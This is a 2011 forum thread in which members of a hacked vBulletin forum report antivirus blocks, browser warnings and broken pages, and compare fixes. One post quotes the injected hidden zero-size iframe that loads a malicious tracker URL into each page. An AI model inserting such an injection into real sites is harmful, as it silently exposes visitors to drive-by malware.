Is ASN ill?? Virus???

Ads

ASN Veteran
Reaction score
Website
www.aythreee.com
Has this site got a virus or something?

My antivirus (Sophos) has all of a sudden started blocking access to the forum, giving "Mal/frame-v" as the reason.
Also noticed that the post message fields have all gone funny. i.e. they are squashed to such an extent that I can't type in them.

Anyone else experiencing problems, or is it just my problem??

PS: I'm having to post this using my iPhone.

yeh theres some dodgy iframe in the source code at the top of each page

I've blocked it with Adblock Plus for now.

Admin on it, not sure what yet, it has come at the same time as a java update, so who knows. Blocked on ABP for now.

Possible site will go down for cleansing if it's poorly though, so be aware

yep its hit me too, just had to run anti malware to remedy it...

Ah ok, thought it might have been just me, our network had a bit of a close shave with a virus the other day. Cheers guys.

Jave code injection would appear, so when we access site, would of potentially added code to local machine if not secured, luckily I was.

Sadly the java got our laptop last weekend, got past all security too! Took days to sort! Glad ASNs sorted! Welcome back online!

OK, so now I'm browsing this with the wonderful IE which is ***** basically.

FF is coming up with the site attack warning, how do I reverse it? lol
mine was too i had to play around with the security settings to get back on asn

Yeap, I'm getting the same with FF

What happened when Google visited this site?
Of the 69 pages that we tested on the site over the past 90 days, 51 page(s) resulted in malicious software being downloaded and installed without user consent. The last time that Google visited this site was on 2011-03-07, and the last time that suspicious content was found on this site was on 2011-03-07.Malicious software includes 53 exploit(s), 16 trojan(s). Successful infection resulted in an average of 2 new process(es) on the target machine.
Malicious software is hosted on 1 domain(s), including ajkqqw.co.cc/.
This site was hosted on 2 network(s) including AS21396 (NETCONNEX), AS29606 (BORWOOD).

Obviously IE works with no issues. Don't you just love Microsoft?:)

Every time I refresh a page on Firefox on my work PC it tries to open Windows Media Player and play a file. My McAfee then pops up to report a Trojan script! Doesn't happen on my home PC so I'm running a full scan now.

Can't get on, on IE.

Can get on, on MF but when on Mozilla I can't post?

Only working on my iPhone!! Very annoying?!

For me the problems that were there before the site was taken down for repair are still there.

1) Firefox - I can access the site and read all threads, but the 'reply to post text' fields are squashed and I can't type in them.
2) Internet Explorer - Sophos is still blocking access, stating Mal/frame-V as the threat. If I turn off my antivirus then I can access but the screen formatting is poo and I keep getting prompted to download and install 'snapview.ocx' add on.

:banghead:I'm having the same problem done a full scan on comp... Hopefully this will remedy this, I can use on my iPhone but all forum threads are squashed up so you can't read the titles:banghead:

mine was too i had to play around with the security settings to get back on asn

Well, I can do that too, but it doesn't remove the problem, just reduces the security of your browser!

So if anyone can do a quick 'how to' on how to revers the problem? I'm only using AVG on my works laptop, so it got attacked, I never surf any dodgy site with that laptop, so no point having a fancy anti virus software. My hope computer is fine though.

Tapnet!! Bit of a problem mate!! Can't get on ASN on a comp to get the link!! How about you email it to us?

I can get on in work but have the same issue as aytheee.
Can't even get on at home.
Running malwarebytes.

Go to download.com and search.

Ok I found it on dl.com run a scan, no problems & still can't get on!

Admin's the version of vBulletin are you using is "Powered by vBulletin™ Version 4.0.7" so its been updated but your data is still dirty..

Bottom line you have been hacked as per the below video and the ""
<iframesrc="http://ajkqqw.co.cc/tracker/?token=4430F2F6463811E0AD50A2DFE1E63F12&source=default&sub=1"width="0"height="0"frameborder="0"></iframe>"" is still in your HTML

Watch Hacking Vbulletin Forums (Ver 3.6.1) - Bad Text Online - VideoSurf Video Search

Last edited by a moderator:
Safari is fine for me

i get a warning message every time i try to a ASN page on safari, any suggestions to fix this?

lol this site is now a reported site on firefox as it contains malicious software. That might kill public views. Anyone in firefox will know what i mean

It appears to be back to normal on every PC and laptop I use.

Well done to the people who go it working again.
Thanks. :)

Still having problems here. Firefox is still blocking the site, and my AV is still detecting virus/spyware when accessing via IE.

Yep, Chrome is still blocking the site as well. I've had to resort back to IE to post this.

Still having problems here. Firefox is still blocking the site, and my AV is still detecting virus/spyware when accessing via IE.

Just me then.

The error in firefox is from block site list that firefox uses.
I dont think firefox checks each site you visit.
It can be a bit miss leading.

Safari on my mac still blocks it!